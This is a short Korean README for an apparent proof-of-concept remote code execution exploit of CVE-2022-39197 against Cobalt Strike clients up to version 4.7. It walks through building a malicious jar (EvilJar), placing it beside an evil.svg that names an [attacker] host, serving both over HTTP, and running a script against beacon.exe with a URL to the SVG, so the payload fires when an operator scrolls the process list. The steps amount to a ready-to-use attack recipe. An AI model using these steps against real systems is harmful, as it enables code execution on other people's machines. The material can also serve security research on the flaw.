
CVE-2022-39197 RCE POC
이 프로젝트는 @its-arun의 프로젝트 https://github.com/its-arun/CVE-2022-39197 에서 수정되었습니다.
스크립트를 테스트했을 때, frida 스크립트가 정상적인 순서로 데이터를 조회할 수 없다는 것을 발견했습니다. frida 스크립트를 수정하여 프로세스 이름을 수정하는 방식입니다.
이용 방법에 대한 기여를 해주신 Master @Kai5174 님께 감사드립니다.
EvilJar/src/main/java/Exploit.java 에서 명령어를 페이로드에 맞게 수정하세요. 현재는 계산기만 실행할 수 있습니다.
jar 빌드: mvn clean compile assembly:single
EvilJar/target/ 에서 EvilJar-1.0-jar-with-dependencies.jar 을 serve/ 폴더로 이동하세요.
serve\evil.svg 에서 [attacker] 를 수정하세요.
python3 -m http.server 8080 으로 서빙하세요.
C2 버전이 4.7 이하인 상태로 beacon.exe를 생성하세요.
Windows에서 py 스크립트를 실행하여 온라인 상태가 되어야 하며, 클라이언트가 프로세스 목록에 접근하여 beacon.exe 프로세스를 볼 때 대응 조치를 수행해야 합니다.
python3 -m pip install -r requirements.txt
python3 cve-2022-39197_Yyy.py beacon.exe http://192.168.10.10:8080/evil.svg
사용자가 프로세스 목록을 스크롤하는 즉시 Payload가 트리거됩니다.
Windows

Mac
